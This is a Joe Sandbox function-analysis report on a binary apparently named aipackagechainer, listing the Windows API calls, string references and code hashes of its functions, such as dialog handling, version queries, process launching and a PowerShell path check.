Part of subcall function 00248410: SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000206,?,?,?,?,0024710A), ref: 002484D5

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Window$ItemRect$Text$ActiveCurrentErrorInvalidateLastShowThread
String ID:
API String ID: 2012338523-0
Opcode ID: 77b3ae28132eb5bfb0d5958f2f882aecc21ce2c6b9d32d173150810ab80ed8a6
Instruction ID: 42c1e012310f9012c7e903762a21cf8861b9e62a13842ca8e7459216cc808823
Opcode Fuzzy Hash: 77b3ae28132eb5bfb0d5958f2f882aecc21ce2c6b9d32d173150810ab80ed8a6
Instruction Fuzzy Hash: E961D030914645EFDB10DF68DC48B9ABBB4FF05720F10865AF829A76E1DBB0A914CF91

Function 0023CF80 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 196
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileVersionInfoSizeW.KERNELBASE(?,?,4938EAB5,?,?,00000000,000000FF,?,002471E5), ref: 0023CFE5
GetFileVersionInfoW.KERNELBASE(?,?,00000000,?,00000000,?,?,00000000,000000FF,?,002471E5), ref: 0023D033
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,q$,?,?,00000000,000000FF,?,002471E5), ref: 0023D06D
VerQueryValueW.VERSION(?,?,00000000,000000FF,?,?,?,?,00000000,000000FF,?,002471E5), ref: 0023D0CC

Strings

ProductName, xrefs: 0023D093
\VarFileInfo\Translation, xrefs: 0023D067
q$, xrefs: 0023D05F, 0023D062
\StringFileInfo\%04x%04x\%s, xrefs: 0023D09D

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: FileInfoQueryValueVersion$Size
String ID: ProductName$\StringFileInfo\%04x%04x\%s$\VarFileInfo\Translation$q$
API String ID: 2099394744-1441104830
Opcode ID: 88554b74ee2e5cdff03f43735e4750650e5f7a71191a13834606dbeacf471212
Instruction ID: e27fa7c281cb9de857b42dd4ef177577248ca200233d72817bd36f1f1a8deb1b
Opcode Fuzzy Hash: 88554b74ee2e5cdff03f43735e4750650e5f7a71191a13834606dbeacf471212
Instruction Fuzzy Hash: 8C61DCB1A1110ADFDB04DFA8DC48AEEB7F8FF05314F148169E815A7291EB309D14CBA0

Function 00279EEC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 58
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DecodePointer.KERNEL32(?,?,?,0027A232,002D784C,?,?,?,0025850B,00000000,?,?,4938EAB5,?), ref: 00279EFE
LoadLibraryExA.KERNELBASE(atlthunk.dll,00000000,00000800,?,?,?,0027A232,002D784C,?,?,?,0025850B,00000000,?,?,4938EAB5), ref: 00279F13
DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,4938EAB5,?), ref: 00279F8F

Strings

AtlThunk_AllocateData, xrefs: 00279F24
AtlThunk_DataToCode, xrefs: 00279F52
AtlThunk_InitData, xrefs: 00279F3B
AtlThunk_FreeData, xrefs: 00279F69
atlthunk.dll, xrefs: 00279F0E

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: DecodePointer$LibraryLoad
String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
API String ID: 1423960858-1745123996
Opcode ID: af6f24225b263687d837ee0587bf421f74afb4e241e78c9291155e41cc9afddc
Instruction ID: 323e9bee1374c919ef516de18bf66895d54b0595230731fe8b3ea14565cfe7c9
Opcode Fuzzy Hash: af6f24225b263687d837ee0587bf421f74afb4e241e78c9291155e41cc9afddc
Instruction Fuzzy Hash: EB01C4706743516FCE01AF20AC0AB993B495B13B18F054061F84DE6792FBB58DB9E986

Function 00248410 Relevance: 10.6, APIs: 7, Instructions: 73
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000002), ref: 00248430
GetWindowRect.USER32(00000000,?), ref: 00248446
ShowWindow.USER32(00000000,00000000,?,?,?,?,0024710A), ref: 0024845F
InvalidateRect.USER32(00000000,00000000,00000001,?,?,?,?,0024710A), ref: 0024846A
GetDlgItem.USER32(00000000,000003E9), ref: 0024847C
GetWindowRect.USER32(00000000,?), ref: 00248492
SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000206,?,?,?,?,0024710A), ref: 002484D5

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Window$Rect$Item$InvalidateShow
String ID:
API String ID: 2147159307-0
Opcode ID: 57947af0b54a331ce781ea20f47118cf3395193475d05627773ede4aee2b3759
Instruction ID: c5d216dc37da3854654fce1656122bd73ff3e6fac003ea8723a5fa3e49003102
Opcode Fuzzy Hash: 57947af0b54a331ce781ea20f47118cf3395193475d05627773ede4aee2b3759
Instruction Fuzzy Hash: 58215A71614300AFD700DF34DC49A7A7BE9EF8D710F058A58F849D7291EB30E9418B52

Function 0022D600 Relevance: 9.1, APIs: 6, Instructions: 149
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitialize.OLE32(00000000), ref: 0022D63B
DefWindowProcW.USER32(00000000,00000000,00000000,00000000,?,?,?,?,?,002A0E6D,000000FF), ref: 0022D656

Part of subcall function 0022D8B0: GetCurrentThreadId.KERNEL32 ref: 0022D90D

EnterCriticalSection.KERNEL32(002D8AA8,?,002A0E6D,000000FF), ref: 0022D69C
DestroyWindow.USER32(00000000,?,002A0E6D,000000FF), ref: 0022D6BA
LeaveCriticalSection.KERNEL32(002D8AA8,?,002A0E6D,000000FF), ref: 0022D703
CoUninitialize.COMBASE(?,002A0E6D,000000FF), ref: 0022D7D1

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: CriticalSectionWindow$CurrentDestroyEnterInitializeLeaveProcThreadUninitialize
String ID:
API String ID: 2072714735-0
Opcode ID: 1a20b10110244a1b5bd9233d6a36ef4762cfbd306f76a29773cc3f73e2cb6117
Instruction ID: a27d30ab0d776b22d3c25863177f86f8a36a456191fdef2b5f85ef924426f2e6
Opcode Fuzzy Hash: 1a20b10110244a1b5bd9233d6a36ef4762cfbd306f76a29773cc3f73e2cb6117
Instruction Fuzzy Hash: 2351C571A11251AFEB20DFA8EC09B9AB7B4BF05700F14445DE849AB2D1DB74AD14CB91

Function 002356F0 Relevance: 9.1, APIs: 6, Instructions: 93processsynchronizationCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,002A210D,00000000,00000000,?), ref: 0023578B
GetLastError.KERNEL32 ref: 0023579C
WaitForSingleObject.KERNEL32(?,000000FF), ref: 002357B2
GetExitCodeProcess.KERNELBASE(?,00000000), ref: 002357C3
CloseHandle.KERNEL32(?), ref: 002357CD
Wow64RevertWow64FsRedirection.KERNEL32(00000000), ref: 002357E8

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: ProcessWow64$CloseCodeCreateErrorExitHandleLastObjectRedirectionRevertSingleWait
String ID:
API String ID: 3742689608-0
Opcode ID: d967d55077798aeba1dfe9fc85dc0c318245ea8cfff9aab72fe15d49b608590e
Instruction ID: 9cae9757196338456d04f6c2cabee37b50027ea765300b8ee2a3ac9750690cf0
Opcode Fuzzy Hash: d967d55077798aeba1dfe9fc85dc0c318245ea8cfff9aab72fe15d49b608590e
Instruction Fuzzy Hash: F5314D71E1075ADBDB10CFA4DD48BAEBBF8BF4A714F145219E814B7290DB709940CB60

Function 0024FAE0 Relevance: 7.7, APIs: 5, Instructions: 156threadCOMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 0024FC0D

Part of subcall function 00257990: SendMessageW.USER32(?,00000080,00000001,00000000), ref: 002579D4
Part of subcall function 00257990: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 002579DF

Part of subcall function 00248840: GetWindowLongW.USER32(?,000000F0), ref: 00248887
Part of subcall function 00248840: GetParent.USER32 ref: 0024889D
Part of subcall function 00248840: GetWindowRect.USER32(?,?), ref: 002488A8
Part of subcall function 00248840: GetParent.USER32(?), ref: 002488B0
Part of subcall function 00248840: GetClientRect.USER32(00000000,?), ref: 002488BF
Part of subcall function 00248840: GetClientRect.USER32(?,?), ref: 002488C8
Part of subcall function 00248840: MapWindowPoints.USER32(00000002,00000000,?,00000002), ref: 002488D4

SetWindowTextW.USER32(?,?), ref: 0024FB3E

Part of subcall function 00213540: GetProcessHeap.KERNEL32 ref: 00213595

Part of subcall function 00214E80: FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,?,00242BC5,-00000010,?,?,?,4938EAB5,?,00000000,?,00000000), ref: 00214EA3

GetDlgItem.USER32(00000001,0000040A), ref: 0024FB7A
SetWindowTextW.USER32(00000000,00000000), ref: 0024FB85

Part of subcall function 0025EA60: GetWindowLongW.USER32(?,000000F0), ref: 0025EA85
Part of subcall function 0025EA60: GetParent.USER32(?), ref: 0025EA8F

CreateThread.KERNELBASE(00000000,00000000,Function_0003FF50,?,00000000,?), ref: 0024FBA9

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Window$ParentRect$ClientLongMessageSendText$CreateDialogFindHeapItemPointsProcessResourceThread
String ID:
API String ID: 3383473789-0
Opcode ID: 06a067f7e4dc4535fdb7a3a1b68b9b6af378f225d542644f3ce0b3842e1e7d0a
Instruction ID: 1b76def6fd87b5329a99244c390397374c86724ccfbf1c6ce08512777075c103
Opcode Fuzzy Hash: 06a067f7e4dc4535fdb7a3a1b68b9b6af378f225d542644f3ce0b3842e1e7d0a
Instruction Fuzzy Hash: DE510472A1460AAFE704DF18D945B99B7A4FB45320F00827AFD15C7790DB75A820CFA0

Function 00235640 Relevance: 7.6, APIs: 5, Instructions: 64windowCOMMON

Download Yara Rule

APIs

MsgWaitForMultipleObjectsEx.USER32(00000001,?,000000FF,000005FF,00000004), ref: 00235661
PeekMessageW.USER32(?,00000000), ref: 002356A7
TranslateMessage.USER32(?), ref: 002356B2
DispatchMessageW.USER32(?), ref: 002356B9
MsgWaitForMultipleObjectsEx.USER32(00000001,?,000000FF,000005FF,00000004), ref: 002356CB

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Message$MultipleObjectsWait$DispatchPeekTranslate
String ID:
API String ID: 4084795276-0
Opcode ID: 2d2a2106ac7f308f929e364ef245b3c83fc34a5237720e5b8b998bed40de33ff
Instruction ID: 90e1980ce3277a5289cc480e0215b0a799bbfce750376a93614c952a6930a454
Opcode Fuzzy Hash: 2d2a2106ac7f308f929e364ef245b3c83fc34a5237720e5b8b998bed40de33ff
Instruction Fuzzy Hash: C91106716443167BEA108B51AD81FA6B7DCDB89770F90062AFA14970C0EB70E9898B65

Function 002473A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?,4938EAB5,00000000,002A5ACE,000000FF), ref: 002473F3
PathAppendW.SHLWAPI(00000000,WindowsPowerShell\v1.0\powershell.exe), ref: 0024740A
PathFileExistsW.KERNELBASE(00000000), ref: 00247418

Part of subcall function 00213540: GetProcessHeap.KERNEL32 ref: 00213595

Part of subcall function 00214E80: FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,?,00242BC5,-00000010,?,?,?,4938EAB5,?,00000000,?,00000000), ref: 00214EA3

Strings

WindowsPowerShell\v1.0\powershell.exe, xrefs: 00247401

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Path$AppendExistsFileFindFolderHeapProcessResource
String ID: WindowsPowerShell\v1.0\powershell.exe
API String ID: 2424349261-2665178159
Opcode ID: 94aae1e1179750dc89e3b70a6d6a87342816ee587a27c219631e093ec0f4db09
Instruction ID: 8ce57911fc413a2d061c5eb2292d949a323a2fdeba5bd28e5283afafe4484790
Opcode Fuzzy Hash: 94aae1e1179750dc89e3b70a6d6a87342816ee587a27c219631e093ec0f4db09
Instruction Fuzzy Hash: B141B371614249AFDB24DF64DC49BEE7BB8FF04710F50852AE929DB281EB349A14CB50

Function 0024FEE0 Relevance: 6.0, APIs: 4, Instructions: 37windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,0000040A), ref: 0024FEF9
SetWindowTextW.USER32(00000000,?), ref: 0024FF00
GetDlgItem.USER32(00000000,0000040B), ref: 0024FF11
SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 0024FF1E

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Item$MessageSendTextWindow
String ID:
API String ID: 2101643998-0
Opcode ID: 5580ce6cd9a2e05f8f4d0b21a9e2af3755589f9e552909b2dca3739f6e267e17
Instruction ID: 802339a8a23cf95e3462bce07e22f26c7a39f77aa4fc52b093183ccb7fb42a27
Opcode Fuzzy Hash: 5580ce6cd9a2e05f8f4d0b21a9e2af3755589f9e552909b2dca3739f6e267e17
Instruction Fuzzy Hash: DBF04972500612BFDF124F50DC08E2AFB79FF99B11B058559F604639A0CB71A832CF90

Function 002483A0 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 002483A9
DestroyWindow.USER32(00000005), ref: 002483B8
PostMessageW.USER32(00000005,00000401,00000000,00000000), ref: 002483D6
IsWindow.USER32(00000005), ref: 002483E5

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Window$CurrentDestroyMessagePostThread
String ID:
API String ID: 3186974096-0
Opcode ID: c8621e5a20163119c3b8cd47bfa98c85e2e5dd44e6deca4bffd89ebb856c360e
Instruction ID: b8896946b8007c52cf56b42e4b3822c3579d20c3e7fd5f02acd216d52f0bbab3
Opcode Fuzzy Hash: c8621e5a20163119c3b8cd47bfa98c85e2e5dd44e6deca4bffd89ebb856c360e
Instruction Fuzzy Hash: 08F0E2710217509BDB349F28FE4CB16BFD46B49F00F02098DE48286990CBB0F882CB14

Function 0024C500 Relevance: 4.6, APIs: 3, Instructions: 86registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(80000001,?,00000000,00020019,?,4938EAB5), ref: 0024C540
RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0024C57E
RegOpenKeyExA.KERNELBASE(80000001,?,00000000,00020019,0000000C,?), ref: 0024C5CF

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Open$InfoQuery
String ID:
API String ID: 223210943-0
Opcode ID: c765e499d34a5e6d7359477c80424926096864b94f022f0b53430cbb7952f407
Instruction ID: 4eeb568f51e81ae1c680ce02ecf492248d12262819b0caaac5557eab09023e03
Opcode Fuzzy Hash: c765e499d34a5e6d7359477c80424926096864b94f022f0b53430cbb7952f407
Instruction Fuzzy Hash: 7B21C771A44209AFEB10CF98DC45F99FBB8FB04B10F20416AF915E72C0D7B16910CB91

Function 0024FF50 Relevance: 4.6, APIs: 3, Instructions: 71COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0024FF77
EndDialog.USER32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,002A765D,000000FF), ref: 0024FFE0
CoUninitialize.COMBASE(00000000,?,?,?,?,?,002A765D,000000FF), ref: 0024FFF0

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: DialogInitializeUninitialize
String ID:
API String ID: 112388368-0
Opcode ID: 7bc239675cef3c67ab5f4560090a90f93167f464c43909917b68587bb497c9a5
Instruction ID: a5dcea90eb410cbb84b81a0e38b0f96792e27a3d104f3d50d31acfb3420f3219
Opcode Fuzzy Hash: 7bc239675cef3c67ab5f4560090a90f93167f464c43909917b68587bb497c9a5
Instruction Fuzzy Hash: 7021D231B25211ABDB288F18D908F6EBBE8EF8AB10F06416AE905D77D0DB70DC048690

Function 0024FD70 Relevance: 4.5, APIs: 3, Instructions: 30windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,0000040B), ref: 0024FD7D
SendMessageW.USER32(00000000,00000401,00000000,00000000), ref: 0024FD98
SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 0024FDA8

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: MessageSend$Item
String ID:
API String ID: 3888421826-0
Opcode ID: 12a8de107ac75a77140a1717bf35c163007b4527e6bf6866f77ab5c5215a5bb5
Instruction ID: 4265f54892bb99bde9170a9ae2c169f2e929fa03e2e83a3a45c3185030df07bf
Opcode Fuzzy Hash: 12a8de107ac75a77140a1717bf35c163007b4527e6bf6866f77ab5c5215a5bb5
Instruction Fuzzy Hash: 35F06DB52403146FFB109F19AC4AFBA7BA8EB09711F118416FB10B62D0C7F658068BB8

Function 0028A721 Relevance: 4.5, APIs: 3, Instructions: 15COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,0028A71B,?,00281362,?,?,4938EAB5,00281362,?), ref: 0028A732
TerminateProcess.KERNEL32(00000000,?,0028A71B,?,00281362,?,?,4938EAB5,00281362,?), ref: 0028A739
ExitProcess.KERNEL32 ref: 0028A74B

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: e09ccf49bb2c4590b5a9a8c641bebbbc030b6738b356f6f35e8f3de22b0ad8f1
Instruction ID: 09789ddc207eb6f211832b153d80e0930a3f3d64e6cbf4367645ea98e089704c
Opcode Fuzzy Hash: e09ccf49bb2c4590b5a9a8c641bebbbc030b6738b356f6f35e8f3de22b0ad8f1
Instruction Fuzzy Hash: 0CD05E31001104BFEF013F60EC0D94D7F36EF81341B450011B9085A071DF7698A7AB41

Function 00234610 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00213540: GetProcessHeap.KERNEL32 ref: 00213595

_wcsrchr.LIBVCRUNTIME ref: 002346D1

Strings

\\?\, xrefs: 0023437B, 002343F8, 0023440A, 00234414, 002344EB, 00234568, 0023457A, 00234584

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: HeapProcess_wcsrchr
String ID: \\?\
API String ID: 3185730412-4282027825
Opcode ID: bca520a9c240588b5dd179d06ff4547b5956c82e7d9364b9327b9d3ad0710274
Instruction ID: fd519fef31d6a75abc861bceee00b67dcce652707dbcc4f4466533808d10f48d
Opcode Fuzzy Hash: bca520a9c240588b5dd179d06ff4547b5956c82e7d9364b9327b9d3ad0710274
Instruction Fuzzy Hash: 9E41C170A11606DBDB04EF68C849BAEF7F9EF45324F248299E4219B291DB34AD14CF90

Function 00248500 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,00000000,00000000), ref: 002485D1

Strings

$, xrefs: 0024853D

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: LongWindow
String ID: $
API String ID: 1378638983-3993045852
Opcode ID: 2fd6dafe261871f995095a13a0e2b4fef813c7f0db61e41888a2f3349c5a10ab
Instruction ID: 40ecdb3e6a3a898a3bde4cb8855b943ebbe783d9c3507d9320b5eeef38959518
Opcode Fuzzy Hash: 2fd6dafe261871f995095a13a0e2b4fef813c7f0db61e41888a2f3349c5a10ab
Instruction Fuzzy Hash: 9F31C971128340DBCB58DF08C88472ABBF4BF89310F44855DF9458B295DBB1E964CF92

Function 00279866 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00279817

Part of subcall function 00279B6C: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00279B77
